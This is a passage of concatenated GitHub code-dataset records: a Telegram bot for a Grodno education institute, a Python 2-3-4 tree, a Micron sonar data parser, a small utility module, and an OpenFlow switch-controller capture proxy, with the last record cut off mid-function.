занятий',\n 'Погода в Гродно',\n ]\n keyboard = types.ReplyKeyboardMarkup(resize_keyboard=True)\n keyboard.add(*start_buttons)\n\n global user_id\n user_id = message.from_user.id\n name = message.from_user.first_name\n last_name = message.from_user.last_name\n date = message.date.ctime()\n # def user_photo(message):\n # photo = bot.get_user_profile_photos(message.from_user.id)\n # bot.send_photo(message.chat.id, photo.photos[0][2].file_id)\n\n # users_dict[user_id] = {\n # 'name': name,\n # 'last_name': last_name,\n # 'date': date,\n # }\n\n with open('users.txt', 'a') as f:\n f.write(f' {date} {user_id} {name} {last_name}\\n')\n\n await message.answer(\n f'Добрый день, {message.from_user.first_name}!\\n👩🏻‍🏫 Добро пожаловать в чат-бот Гродненского областного института развития образования!‍🎓‍🏫‍ \\n'\n f'👏Рады Вас приветствовать!👏\\n'\n f'Больше информации Вы можете получить на нашем сайте {hlink(\"groiro.by\", \"https://groiro.by/\")}.\\n'\n f'Выберите один из пунктов меню ниже👇', reply_markup=keyboard, disable_web_page_preview=True)\n\n\n@dp.message_handler(Text(equals='Последние 5 новостей'))\nasync def get_last_five_news(message: types.Message):\n with open('news_dict.json') as f:\n news_dict = json.load(f)\n\n for k, v in sorted(news_dict.items())[-5:]:\n image = types.input_file.InputFile.from_url(v['article_img'])\n news = f\"🔥{hbold(v['article_title'])}🔥\\n\\n\" \\\n f\"Подробнее 👉{hlink('ЗДЕСЬ', v['article_url'])}🎓\"\n await message.answer_photo(image, news)\n\n\n@dp.message_handler(Text(equals='Анонсы мероприятий'))\nasync def get_announcement(message: types.Message):\n ann_dict = get_announcements()\n\n for k, v in sorted(ann_dict.items()):\n ann = f\"{hbold(v['ann_title'])}\\n\\n\" \\\n f\"{hbold('Дата: ' + v['ann_date'])}\\n\\n\" \\\n f\"Подробнее 👉{hlink('ЗДЕСЬ', v['ann_url'])}🎓\"\n # print(ann)\n await message.answer(ann, disable_web_page_preview=True)\n\n\n# @dp.message_handler(Text(equals='Сообщить об ошибке'))\n# async def get_error_message(message: types.Message):\n# await message.answer('Введите Ваше сообщение и нажмите \"Отправить\"')\n#\n# @dp.callback_query_handler(lambda call: True)\n# async def get_message_from_user(callback_query: types.CallbackQuery):\n# await bot.send_message(admin_id,\n# f'Пользователь {message.from_user.first_name + \" \" + message.from_user.last_name}'\n# f'(id: {message.from_user.id}) написал Вам сообщение.\\n\\n'\n# f'{callback_query.data}')\n# await message.answer('Спасибо, Ваше сообщение отправлено администратору.')\n\n\n\n@dp.message_handler(Text(equals=\"Погода в Гродно\"))\nasync def get_weather_in_Grodno(message: types.Message):\n weather = get_weather()\n if isinstance(weather, EmptyWeather):\n await message.answer(\n f'Возникла ошибка при получении погоды.\\nВероятно мы уже знаем об этом.\\nПожалуйста, попробуйте позже.')\n # raise weather\n # print(weather)\n else:\n await message.answer(f'🌎 {hbold(\"Погода в Гродно сейчас.\")} 🌈\\n\\n'\n f'{hbold(\"Актуально на\")} {weather.at_time.strftime(\"%d.%m %H:%M\")}\\n\\n'\n f'{weather.describe}\\n'\n f'{hbold(\"Температура:\")} {round(weather.temperature)}°С\\n'\n f'{hbold(\"Влажность:\")} {weather.himidity}%\\n'\n f'{hbold(\"Давление:\")} {weather.pressure} мм.рт.ст\\n'\n f'{hbold(\"Ветер:\")} {weather.wind_speed} м/с\\n'\n f'{hbold(\"Рассвет:\")} {weather.sunrise.strftime(\"%d.%m %H:%M\")}\\n'\n f'{hbold(\"Закат:\")} {weather.sunset.strftime(\"%d.%m %H:%M\")}\\n\\n'\n f'{hbold(\"🤩 Хорошего дня 🤩\")}')\n\n\n@dp.message_handler(Text(equals=\"Расписание занятий\"))\nasync def choose_timetable(message: types.Message):\n dict_ttables = show_list_timetable()\n markup = types.InlineKeyboardMarkup()\n markup.row_width = 1\n for k, v in dict_ttables.items():\n markup.add(types.InlineKeyboardButton(f'{k} {v}', callback_data=k))\n await bot.send_message(message.from_user.id, 'Выберите Ваше ПК:', reply_markup=markup)\n\n @dp.callback_query_handler(lambda call: True)\n async def send_timetable(callback_query: types.CallbackQuery):\n await bot.answer_callback_query(callback_query.id)\n if callback_query.data in dict_ttables:\n tt = get_timetable(callback_query.data)\n await message.answer(f\"{hbold('Ваше ПК:')} {tt[0]}.\\n\\n\")\n await message.answer_document(open(tt[1], \"rb\"),\n caption='Ваше расписание ☝. Нажмите на него, чтобы скачать.')\n\n\nasync def news_every_10_minute():\n while True:\n fresh_news = check_news_update()\n fresh_anns = check_ann_update()\n\n if len(fresh_news) >= 1:\n for k, v in sorted(fresh_news.items()):\n image = types.input_file.InputFile.from_url(v['article_img'])\n news = f\"🔥{hbold(v['article_title'])}🔥\\n\\n\" \\\n f\"Подробнее 👉{hlink('ЗДЕСЬ', v['article_url'])}🎓\"\n await bot.send_photo(user_id, image, news)\n\n if len(fresh_anns) >= 1:\n for k, v in sorted(fresh_anns.items()):\n ann = f\"{hbold(v['ann_title'])}\\n\\n\" \\\n f\"{hbold('Дата: ' + v['ann_date'])}\\n\\n\" \\\n f\"Подробнее 👉{hlink('ЗДЕСЬ', v['ann_url'])}🎓\"\n await bot.send_message(user_id, ann)\n\n await asyncio.sleep(600)\n\n\nif __name__ == '__main__':\n loop = asyncio.get_event_loop()\n loop.create_task(news_every_10_minute())\n executor.start_polling(dp)\n","repo_name":"EvgeniiPlus/tgBot_GrOIRO","sub_path":"tgBot.py","file_name":"tgBot.py","file_ext":"py","file_size_in_byte":7432,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"31628322641","text":"# -*- coding=utf-8 -*-\n\nclass Node(object):\n\n def __init__(self):\n self.ORDER = 4\n self.numItems = 0\n self.items = [None]*(self.ORDER - 1) # [None,None,None] index from 0-2\n self.children = [None]*self.ORDER # [None,None,None,None] index from 0-3\n\n\n def connectChild(self, childNum, child):\n \"\"\" Connect child to this node \"\"\"\n self.children[childNum] = child\n\n if child != None:\n child.parent = self\n\n def disconnectChild(self, childNum):\n \"\"\" Disconnect child from this node, return it \"\"\"\n tempNode = self.children[childNum]\n self.children[childNum] = None\n return tempNode\n\n def getChild(self, childNum):\n \"\"\" Get child node \"\"\"\n return self.children[childNum]\n\n def isLeaf(self):\n \"\"\" Is node leaf \"\"\"\n return True if (self.children[0] == None) else False\n\n def getNumItems(self):\n \"\"\" Get number of items \"\"\"\n return self.numItems\n\n def getItem(self, index):\n \"\"\" Get item \"\"\"\n # get DataItem at index\n return self.items[index]\n\n def isFull(self):\n \"\"\" Check if items array full \"\"\"\n return True if (self.numItems == self.ORDER - 1) else False\n\n def findItem(self, key):\n \"\"\" Find item by key. Return index of item (within node) \"\"\"\n j = 0\n while j < self.ORDER - 1:\n # if found,\n # otherwise,\n if self.items[j] == None:\n break # return -1\n elif self.items[j] == key:\n return j\n j += 1\n return -1\n\n def insertItem(self, newItem):\n \"\"\" Insert new item \"\"\"\n self.numItems += 1\n \n for j in range(self.ORDER-2, -1, -1): # shift items\n if self.items[j] == None:\n continue\n else:\n if newItem < self.items[j]:\n self.items[j + 1] = self.items[j] # shift right bigger\n else:\n self.items[j + 1] = newItem # insert new item\n return j + 1 # return index to newItem\n\n self.items[0] = newItem\n return 0\n\n def removeItem(self):\n \"\"\" Remove item \"\"\"\n temp = self.items[self.numItems - 1]\n self.items[self.numItems - 1] = None\n self.numItems -= 1\n return temp\n\n def inorder(self):\n j = 0\n while j < self.numItems:\n if self.children[j] != None:\n yield from self.children[j].inorder()\n yield self.items[j]\n j += 1\n\n if self.children[j] != None:\n yield from self.children[j].inorder()\n\n\n def __repr__(self):\n \"\"\"Useful debugging function to produce linear tree representation.\"\"\"\n return \"{}:{}\".format(self.items, self.children)\n\nclass Tree234(object):\n\n def __init__(self, *initVals):\n self.root = Node()\n for _ in initVals:\n self.insert(_)\n\n def find(self, key):\n \"\"\" Find item \"\"\"\n curNode = self.root\n childNum = 0\n\n while True:\n childNum = curNode.findItem(key)\n if childNum != -1:\n return childNum\n elif curNode.isLeaf():\n return -1\n else:\n curNode = self.getNextChild(curNode, key)\n\n def insert(self, value):\n \"\"\" Insert new value \"\"\"\n node = self.root\n\n while True:\n if node.isFull():\n self.split(node)\n node = node.parent\n node = self.getNextChild(node, value)\n elif node.isLeaf():\n break\n else:\n node = self.getNextChild(node, value)\n\n node.insertItem(value)\n\n def split(self, thisNode):\n \"\"\" Split the node \"\"\"\n itemIndex = 0\n\n itemC = thisNode.removeItem()\n itemB = thisNode.removeItem()\n child2 = thisNode.disconnectChild(2)\n child3 = thisNode.disconnectChild(3)\n \n if thisNode == self.root:\n self.root = Node()\n parent = self.root\n self.root.connectChild(0, thisNode)\n else:\n parent = thisNode.parent\n\n itemIndex = parent.insertItem(itemB)\n j = parent.numItems - 1\n while j > itemIndex: # shift children to right for new child\n temp = parent.disconnectChild(j)\n parent.connectChild(j + 1, temp)\n j -= 1\n\n newRight = Node()\n parent.connectChild(itemIndex + 1, newRight)\n newRight.insertItem(itemC)\n newRight.connectChild(0, child2) # connect 2,3 childrens to rightNode\n newRight.connectChild(1, child3)\n\n def getNextChild(self, node, value):\n \"\"\" Get next child \"\"\"\n j = 0\n while j < node.numItems:\n if value < node.getItem(j):\n return node.getChild(j)\n j += 1\n\n return node.getChild(j)\n\n def __iter__(self):\n \"\"\"In order traversal of elements in the tree.\"\"\"\n if self.root:\n for e in self.root.inorder():\n yield e\n\n def displayTree(self):\n \"\"\" Display tree \"\"\"\n self.recDisplayTree(self.root, 0, 0)\n\n def recDisplayTree(self, node, level, childNumber):\n \"\"\" Recursevly display tree \"\"\"\n print(\"level={} child={} {}\".format(level, childNumber, node))\n\n for j in range(0, node.numItems+1):\n nextNode = node.getChild(j)\n if nextNode != None:\n self.recDisplayTree(nextNode, level + 1, j)\n else:\n return\n\n\nif __name__ == \"__main__\":\n t=Tree234(30, 50, 70, 40, 20, 80, 25, 90, 75, 10)\n #t.displayTree()\n for v in t:\n print(v)","repo_name":"RANUX/python-algorithms","sub_path":"4. Recursive Structures/my/tree234.py","file_name":"tree234.py","file_ext":"py","file_size_in_byte":5856,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"1938364866","text":"# MicronEnsemble.py\n#\n# Represents a Micron Sonar ensemble.\n# 2020-03-13 zduguid@mit.edu initial implementation \n\nimport datetime\nimport dateutil\nimport math\nimport numpy as np\nimport pandas as pd \nfrom MicronSonar import MicronSonar\n\nclass MicronEnsemble(MicronSonar):\n def __init__(self, csv_row, date, bearing_bias=0, sonar_depth=None, \n sonar_altitude=None):\n \"\"\"Constructor of a Micron Sonar ensemble\n\n The Micron Sonar User Manual and Seanet DumpLog Software Manual were \n used to write this code.\n\n Args: \n csv_row: A list of strings that represent one ensemble from the\n Micron Sonar without any additional processing. The first 15\n values of the list are header variables, and then the\n remaining variables are acoustic intensity values.\n date: A tuple of integers representing (year,month,day). The date \n argument should match the date of which the data is recorded.\n bearing_bias: Optional argument to represent the bias of the \n scanning sonar in units of degrees while the data was being \n collected. The bearing bias may be due to the vehicle rolling, \n or from an error in the mounting configuration. Positive \n bearing bias corresponds with the vehicle rolling right due to \n a banking right turn and negative bearing bias corresponds \n with the vehicle rolling left due to a banking left turn.\n sonar_depth: depth in [m] of the sonar transducer head, used for \n filtering out surface reflections in the intensity bins.\n sonar_altitude: altitude in [m] of the sonar transducer head, used \n for filtering out bottom reflections in the intensity bins.\n \"\"\"\n # use the parent constructor for defining Micron Sonar variables\n super().__init__()\n\n # initialize Micron Ensemble data array based on number of variables\n self._data_array = np.zeros(self.ensemble_size)\n\n # parse header and acoustic intensities, compute derived variables \n self.set_data('sonar_depth', sonar_depth)\n self.set_data('sonar_altitude', sonar_altitude)\n self.parse_header(csv_row, date, bearing_bias)\n self.parse_intensity_bins(csv_row)\n self.parse_derived_vars()\n \n\n @property\n def data_array(self):\n return self._data_array\n \n @property\n def intensity_data(self):\n return self.data_array[self.intensity_index:]\n\n\n def get_data(self, var):\n \"\"\"Getter method for a give variable in the data array\"\"\"\n if (var not in self.label_set):\n raise ValueError(\"bad variable for: get(%s)\" % (var))\n else:\n return self.data_array[self.data_lookup[var]]\n\n\n def set_data(self, var, val, attribute=True):\n \"\"\"Setter method for a variable-value pair to be put in the array\"\"\"\n if (var not in self.label_set):\n raise ValueError(\"bad variable for: set(%s, %s)\" % (var, str(val)))\n self._data_array[self.data_lookup[var]] = val \n if attribute: setattr(self, var, val)\n\n\n def parse_header(self, csv_row, date, bearing_bias):\n \"\"\"Parses the header variables of the Micron Sonar ensemble\n\n Args: \n csv_row: a list of strings representing an ensemble of data.\n date: a tuple of (year,month,day) values\n bearing_bias: a number that represents the bias of the sonar angle \n when the data was collected. Positive bearing bias corresponds \n with the vehicle rolling right due to a banked right turn. \n \"\"\"\n # add header values to the data array \n for i in range(len(self.header_vars)):\n\n # handle line header parameter (does not contain numerical type)\n if (i == self.header_vars.index('line_header')): \n self.set_data('line_header', 1)\n \n # add year,month,day to DateTime object \n elif (i == self.header_vars.index('date_time')): \n (year, month, day) = date\n date_time = date_time = dateutil.parser.parse(csv_row[i])\n date_time = date_time.replace(year=year, month=month, day=day,\n microsecond=0)\n self.set_data('date_time', date_time.timestamp())\n self.set_data('year', year)\n self.set_data('month', month)\n self.set_data('day', day)\n\n # parse all other header variables (all others are numerical) \n else:\n variable = self.header_vars[i]\n value = int(csv_row[i])\n self.set_data(variable, value)\n\n # set the bearing bias to compute the bearing correctly \n self.set_data('bearing_bias', bearing_bias)\n\n # convert header values to standard metric values \n self.convert_to_metric('range_scale', self.DM_TO_M)\n self.convert_to_metric('gain', self.BIN_TO_PER)\n self.convert_to_metric('ad_low', self.BIN_TO_DB)\n self.convert_to_metric('ad_span', self.BIN_TO_DB)\n self.convert_to_metric('left_lim', self.GRAD_TO_DEG)\n self.convert_to_metric('right_lim', self.GRAD_TO_DEG)\n self.convert_to_metric('steps', self.GRAD_TO_DEG*2)\n self.convert_to_metric('bearing', self.GRAD_TO_DEG)\n\n # update coordinate system of Micron Sonar bearing \n # - includes bearing bias correction \n bearing = self.reorient_bearing(self.get_data('bearing'), bias=False)\n ref_world = self.reorient_bearing(self.get_data('bearing'), bias=True)\n left_lim = self.reorient_bearing(self.get_data('left_lim'))\n right_lim = self.reorient_bearing(self.get_data('right_lim'))\n self.set_data('bearing', bearing)\n self.set_data('bearing_ref_world', ref_world)\n self.set_data('left_lim', left_lim)\n self.set_data('right_lim', right_lim)\n\n # compute incidence angle based upon bearing after corrected \n # - incidence angle is defined as the angle deviation away from \n # the sonar pointing directly upwards to the ocean (or ice) surface\n incidence_angle = abs(self.get_data('bearing_ref_world'))\n self.set_data('incidence_angle', incidence_angle)\n\n # compute the bin size in order to parse intensity bins correctly\n self.set_data('bin_size', self.range_scale / self.dbytes)\n\n\n def parse_intensity_bins(self, csv_row):\n \"\"\"Parses acoustic intensity values and adds them to the data array\"\"\"\n # more intensity bins are received than the size of the array\n if self.dbytes > self.intensity_len:\n raise ValueError(\"bad number of bins: %d\" % (self.dbytes))\n\n # add intensity values to the data array \n for i in range(self.intensity_len):\n bin_label = 'bin_' + str(i)\n # parse the intensity value directly from the array \n if (i+1) < self.dbytes: \n bin_val = float(csv_row[i+self.header_len])\n # keep extra bins set to zero \n else:\n break\n self.set_data(bin_label, bin_val, attribute=False)\n \n # convert intensity bins from [0,255] -> [0,80dB]\n self.convert_to_metric('intensity', self.BIN_TO_DB, intensity=True)\n\n # filter out blanking distance and surface/bottom reflections \n self.filter_blanking_distance()\n self.filter_reflections()\n\n\n def parse_derived_vars(self):\n \"\"\"Computes the derived quantities for the ensemble\"\"\"\n # compute bin size, max intensity, and max intensity bin\n self.set_data('max_intensity', np.max(self.intensity_data))\n self.set_data('max_intensity_bin', np.argmax(self.intensity_data))\n\n # determine the peak of the signal according to the FWHM method\n peak_start_bin, peak_end_bin = self.get_peak_width()\n peak_width_bin = peak_end_bin - peak_start_bin\n self.set_data('peak_start_bin', peak_start_bin)\n self.set_data('peak_end_bin', peak_end_bin)\n self.set_data('peak_width_bin', peak_width_bin)\n self.set_data('peak_start', peak_start_bin * self.bin_size)\n self.set_data('peak_end', peak_end_bin * self.bin_size)\n self.set_data('peak_width', peak_width_bin * self.bin_size)\n\n # compute the normalized max intensity using peak_start variable\n max_intensity_norm = self.max_intensity * self.peak_start\n self.set_data('max_intensity_norm', max_intensity_norm)\n\n # compute vertical range from slant range and bearing \n self.get_vertical_range()\n\n # set ice classifications and labels to np.nan\n # + classifications are made based on swaths not single ensembles\n # + labels are specified manually \n for ice_var in self.ice_vars:\n self.set_data(ice_var, np.nan)\n\n\n def convert_to_metric(self, variable, multiplier, attribute=True, \n intensity=False):\n \"\"\"Converts variable to standard metric value using the multiplier\"\"\"\n if not intensity:\n value = self.get_data(variable)\n self.set_data(variable, value * multiplier, attribute)\n else:\n self._data_array[self.intensity_index:] *= multiplier\n\n\n def reorient_bearing(self, bearing_deg, bias=False):\n \"\"\"Reorient bearing from Micron Sonar default to custom orientation \n\n Accounts for the bearing bias, which is passed to the constructor of \n a MicronEnsemble object. See ReadMe for more in-depth explanation \n of coordinate system.\n\n Args:\n bearing_deg = the bearing in degrees recorded by the Micron Sonar.\n bias: boolean to include the bearing bias or not in calculation \n\n Returns:\n Bearing that has been rotated and flipped into a new orientation.\n \"\"\"\n # constants \n deg_in_circle = 360\n deg_in_half = 180\n bearing_deg *= -1\n if bearing_deg <= -deg_in_half:\n bearing_deg += deg_in_circle\n\n # if given, include bearing bias term (possible due to vehicle roll)\n if bias: \n bearing_deg += self.get_data('bearing_bias')\n return bearing_deg\n\n\n def filter_blanking_distance(self):\n \"\"\"Filters out the intensity values within blanking distance\"\"\"\n blanking_dist_bin = math.ceil(self.BLANKING_DISTANCE/self.bin_size)\n self._data_array[self.intensity_index : \n self.intensity_index + blanking_dist_bin] = 0\n\n\n def filter_reflections(self):\n \"\"\"Filters out surface and bottom reflections\"\"\"\n # epsilon defined to detect when cosine is sufficiently close to zero\n cos_bear = abs(np.cos(self.bearing_ref_world * self.DEG_TO_RAD))\n\n def filter_at_dist(dist):\n \"\"\"Inner function for filtering array values\"\"\"\n bin_index = np.max(math.floor(dist/self.bin_size))\n self._data_array[self.intensity_index + bin_index:] = 0\n\n # filter-out surface reflections when depth is known\n if ((self.sonar_depth) and \n (abs(self.bearing_ref_world) < 90) and\n (cos_bear >= self.COS_EPSILON)):\n filter_at_dist(self.sonar_depth*self.REFLECTION_FACTOR/cos_bear)\n \n # filter-out bottom reflections when depth is known\n if ((self.sonar_altitude) and \n (abs(self.bearing_ref_world) > 90) and\n (cos_bear >= self.COS_EPSILON)):\n filter_at_dist(self.sonar_altitude*self.REFLECTION_FACTOR/cos_bear)\n\n\n def get_peak_width(self):\n \"\"\"Computes the width of the dominant peak of the ensemble\n\n Uses the Full Width Half Maximum (FWHM) method for extracting the width\n of the main signal peak. To account for narrow peaks in ensemble \n intensity values, a rolling median filter and convolution filter \n methods are applied. \n \"\"\"\n # get width of values that satisfy the threshold \n bin_data = pd.DataFrame(self.intensity_data)\n bin_roll = bin_data.rolling(self.ROLL_MEDIAN_LEN, center=True).median()\n bin_roll = bin_roll.replace(np.nan, 0).to_numpy().flatten()\n kernel = np.ones(self.CONV_KERNEL_LEN, dtype=int)\n \n # threshold the array based on half of the maximum intensity \n bin_threshold = np.array(bin_roll)\n bin_threshold[bin_threshold < np.max(bin_roll) / 2] = 0\n bin_threshold[bin_threshold >= np.max(bin_roll) / 2] = 1\n \n # convolve the threshold array to account for narrow valleys \n bin_threshold = np.convolve(bin_threshold, kernel, mode='same')\n bin_threshold[bin_threshold > 0] = 1\n \n # separate the array into left and right sides of the maximum \n max_bin_index = int(self.max_intensity_bin)\n left_of_max = bin_threshold[ :max_bin_index]\n right_of_max = bin_threshold[max_bin_index: ]\n\n # extract the start and end peak values \n if (len(left_of_max) == 0) or (len(right_of_max) == 0):\n peak_start_bin = np.nan\n peak_end_bin = np.nan \n else:\n peak_start_bin = len(left_of_max) - np.argmax(left_of_max[::-1]==0)\n peak_end_bin = np.argmax(right_of_max==0) + max_bin_index\n \n return peak_start_bin, peak_end_bin\n\n\n def get_vertical_range(self):\n \"\"\"Computes the vertical range using slant range and bearing\"\"\"\n cos_bearing = np.cos(self.bearing_ref_world * self.DEG_TO_RAD)\n\n # compute vertical range depending on the cosine of the bearing \n if cos_bearing < 0:\n vertical_range = np.nan\n else:\n vertical_range = self.peak_start*cos_bearing\n\n # set the vertical range value \n self.set_data('vertical_range', vertical_range)\n\n","repo_name":"zduguid/sonar-ice-detect","sub_path":"MicronEnsemble.py","file_name":"MicronEnsemble.py","file_ext":"py","file_size_in_byte":14128,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"3544219544","text":"'''Collection of utility functions'''\nimport shell, os, glob\nfrom typesystem import *\n\ndef chopNewline(string):\n '''!Chops the trailing newline off input string.\n@param string string\n@returns string'''\n mustBeString(string)\n assert (string[-1] == \"\\n\"), string + \" doesn't end in a newline\"\n ret = string[:-1]\n return ret\n\ndef stringIsWhitespace(string):\n '''!Returns True iff input string consists only of whitespace characters.\n@param string string\n@returns bool'''\n mustBeString(string)\n s1 = string.replace(\" \", \"\")\n s2 = s1.replace(\"\\t\", \"\")\n ret = (s2 == \"\")\n return ret\n\ndef quote(string):\n '''!Returns input string enclosed in double-quotes.\n@param string string\n@returns string'''\n mustBeString(string)\n return '\"' + string + '\"'\n\ndef initialCaps(s):\n \"\"\"!Returns a copy of `s' with its first character made uppercase;\nall other characters are left alone.\n@param s string\n@returns string\"\"\"\n return s[0].upper() + s[1:]\n\ndef getAllPythonModulesFromDirectory(directory):\n '''!Returns a list of all .py files in the given directory, stripped of directory\nprefix and .py suffix (suitable for use in __init__.py files)\n@param directory string\n@returns [string, ...]'''\n mustBeString(directory)\n shell.assertFileExists(directory, \"directory\")\n modules_list = glob.glob(directory + \"/*.py\")\n init_file = os.path.join(directory, \"__init__.py\")\n modules_list = filter((lambda s: s != init_file), modules_list)\n module_names = [ shell.basename(module, \".py\") for module in modules_list ]\n return module_names\n\n","repo_name":"davidiw/FeS2-with-DRAMSim2","sub_path":"external/pacg/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":1538,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"77"} +{"seq_id":"5514262672","text":"\"\"\"Proxy Module\n\nTodo:\n * to create reconnecting method\n * to create openflow packet obj\n * to implement filter function\n\"\"\"\nimport asyncio\nfrom datetime import datetime\nfrom logging import getLogger, Logger\n\nfrom ofproto.packet import OFMsg\n\n\nclass Channel:\n \"\"\"OpenFlow channel\"\"\"\n\n filter_func = None\n\n def __init__(self, queue, switch_handler=None, switch_writer=None, controller_handler=None, controller_writer=None):\n \"\"\"init\n\n Args:\n queue (asyncio.Queue) : queue to store packet\n switch_handler (SwitchHandler) :\n switch_writer (asyncio.StreamWriter) :\n controller_handler (ControllerHandler) :\n controller_writer (asyncio.StreamWriter) :\n \"\"\"\n self.q_all = queue\n self.logger = getLogger(\"ofcapture.\" + __name__)\n\n self._switch_handler = switch_handler\n self.switch_writer = switch_writer\n self._controller_handler = controller_handler\n self.controller_writer = controller_writer\n\n def set_switch(self, switch_handler, switch_writer):\n \"\"\"set switch handler to send switch\n\n Args:\n switch_handler (SwitchHandler) :\n switch_writer (asyncio.StreamWriter) :\n \"\"\"\n self._switch_handler = switch_handler\n self.switch_writer = switch_writer\n\n def set_controller(self, controller_handler, controller_writer):\n \"\"\"set controller handler to send controller\n\n Args:\n controller_handler (ControllerHandler) :\n controller_writer (asyncio.StreamWriter) :\n \"\"\"\n self._controller_handler = controller_handler\n self.controller_writer = controller_writer\n\n def _filter(self, data, switch2controller):\n \"\"\"On Packet\n\n Args:\n data (bytes) :\n switch2controller (bool) :\n\n Returns:\n bytes\n \"\"\"\n cls = self.__class__\n if cls.filter_func:\n data = cls.filter_func(data, switch2controller)\n return data\n\n async def send_to_controller(self, data):\n \"\"\"set data and sent to controller\n\n Args:\n data (bytes) : data that is sent to controller\n\n Returns:\n int : -1 if failed to send\n \"\"\"\n if not self.is_closing():\n filtered_data = self._filter(data, switch2controller=True)\n await self._put_queue_all(filtered_data, switch2controller=True)\n await self._controller_handler.send_to_controller(self.controller_writer, filtered_data)\n self.logger.debug(\"set data and sent to controller : {}\".format(filtered_data))\n return 0\n else:\n self.logger.warning(\"Failed to send to controller : {}\".format(data))\n return -1\n\n async def send_to_switch(self, data):\n \"\"\"set data and sent to switch\n\n Args:\n data (bytes) : data that is sent to switch\n\n Returns:\n int : -1 if failed to send\n \"\"\"\n if not self.is_closing():\n filtered_data = self._filter(data, switch2controller=False)\n await self._put_queue_all(filtered_data, switch2controller=False)\n await self._switch_handler.send_to_switch(self.switch_writer, filtered_data)\n self.logger.debug(\"set data and sent to switch : {}\".format(filtered_data))\n return 0\n else:\n self.logger.warning(\"Failed to send to switch : {}\".format(data))\n return -1\n\n async def _put_queue_all(self, data, switch2controller):\n \"\"\"put data as message\n\n Args:\n data (bytes) : data\n switch2controller (bool) : Was the data sent from switch to controller?\n \"\"\"\n timestamp = datetime.now().timestamp()\n local_ip, local_port = self.switch_writer.get_extra_info('peername')\n remote_ip, remote_port = self.controller_writer.get_extra_info('peername')\n msg = OFMsg(timestamp, local_ip, remote_ip, local_port, remote_port, data, switch2controller)\n await self.q_all.put(msg)\n\n def is_closing(self):\n \"\"\"Is this channel closing?\n\n Returns:\n bool : Is this channel established?\n \"\"\"\n is_closing = True\n if self.switch_writer is not None and self.controller_writer is not None\\\n and self._switch_handler is not None and self._controller_handler is not None:\n is_closing = self.switch_writer.is_closing() or self.controller_writer.is_closing()\n\n if is_closing:\n self.logger.debug(\"is_closing is {}, s writer is {}, c writer is {}, s handler is {}, c handler is {},\"\n \" s writer close? {}, c writer close? {}\"\n .format(is_closing, self.switch_writer is not None, self.controller_writer is not None,\n self._switch_handler is not None, self._controller_handler is not None,\n self.switch_writer.is_closing(), self.controller_writer.is_closing()))\n return is_closing\n\n @classmethod\n def filter(cls, func):\n \"\"\"decorator\"\"\"\n def wrapper(data, switch2controller):\n data = func(data, switch2controller)\n return data\n\n cls.filter_func = wrapper\n return wrapper\n\n\nclass ChannelManager:\n \"\"\"Channel Manager\n * This has queue that holds all data and gives the queue to api_module\n * This creates new channel\n\n Attributes:\n q_all (asyncio.Queue) : all data (from switch and controller)\n logger (Logger) : logger\n has_switch_join (bool) : True if a switch has join\n has_controller_join (bool) : True if a controller has join\n controller_handler (ControllerHandler) : client communicating with controller\n \"\"\"\n\n def __init__(self, loop, controller_ip='127.0.0.1', controller_port=6633):\n \"\"\"init\n\n Args:\n loop (asyncio.AbstractEventLoop) : event loop\n controller_ip (str) : controller ip\n controller_port (int) : controller port\n \"\"\"\n self.loop = loop\n self.q_all = asyncio.Queue(loop=self.loop)\n self.logger = getLogger(\"ofcapture.\" + __name__)\n\n self.has_switch_join = False\n self.has_controller_join = False\n\n self.controller_handler = ControllerHandler(controller_ip, controller_port, loop, self)\n\n async def create_channel(self, switch_handler, switch_writer):\n \"\"\"create openflow channel\n\n Args:\n switch_handler (SwitchHandler) : switch connection handler\n switch_writer (StreamWriter) : switch writer\n\n Returns:\n Channel or None : OpenFlow channel. If the controller cannot be connected, return None.\n \"\"\"\n try:\n channel = Channel(self.q_all)\n controller_writer = await self.controller_handler.open_connection(channel)\n if controller_writer:\n channel.set_switch(switch_handler, switch_writer)\n channel.set_controller(self.controller_handler, controller_writer)\n return channel\n else:\n self.logger.debug(\"no connectable controller\")\n return None\n except Exception as e:\n raise\n\n def get_queue_all_data(self):\n \"\"\"queue for all traffic data\n\n Returns:\n asyncio.Queue\n \"\"\"\n return self.q_all\n\n def _has_open_channel(self):\n has_open_channel = self.has_switch_join and self.has_controller_join\n return has_open_channel\n\n\nclass SwitchHandler:\n \"\"\"server communicating with switches\n\n Attributes:\n host (str) : switch ip\n port (int) : switch port\n loop (asyncio.AbstractEventLoop) : event loop\n channel_manager (ChannelManager) : channel manager\n logger (Logger) : logger\n switches (set) : switch set\n \"\"\"\n\n def __init__(self, host, port, loop, channel_manager):\n \"\"\"init SwitchHandler\n\n Args:\n host (str) : switch ip\n port (int) : switch port\n loop (asyncio.AbstractEventLoop) :\n channel_manager (ChannelManager) :\n \"\"\"\n self.host = host\n self.port = port\n self.loop = loop\n self.channel_manager = channel_manager\n self.logger = getLogger(\"ofcapture.\" + __name__)\n\n self.switches = set()\n\n async def start_server(self):\n \"\"\"start server\"\"\"\n server = await asyncio.start_server(self.handle_switch, host=self.host, port=self.port)\n self.logger.info(\"Server on {}\".format(server.sockets[0].getsockname()))\n\n async with server:\n self.logger.info(\"Server serve forever {}\".format(server.sockets[0].getsockname()))\n await server.serve_forever()\n\n async def handle_switch(self, reader, writer):\n \"\"\"Accepting connections from switches\n\n This creates a channel and receives data from the switch.\n This tries to send the received data to the controller, if the connection is established.\n If the connection is not established, the data is discarded.\n\n Args:\n reader (asyncio.StreamReader) :\n writer (asyncio.StreamWriter) :\n\n Returns:\n\n \"\"\"\n peername = writer.get_extra_info('peername')\n self.logger.info(\"Client {} is connected\".format(peername))\n self.switches.add(peername)\n self.channel_manager.has_switch_join = True\n\n channel = await self.channel_manager.create_channel(self, writer)\n if channel is None:\n writer.close()\n return\n\n try:\n while True:\n self.logger.debug(\"waiting data ......\")\n # 64000 is default buffer size\n data = await reader.read(64000)\n self.logger.debug(\"read {}\".format(data))\n if not data:\n self.logger.debug(\"no data from switch read\")\n break\n if not channel.is_closing():\n await channel.send_to_controller(data)\n else:\n self.logger.debug(\"the channel is closing\")\n break\n except BrokenPipeError as e:\n self.logger.error(\"Failed to read: 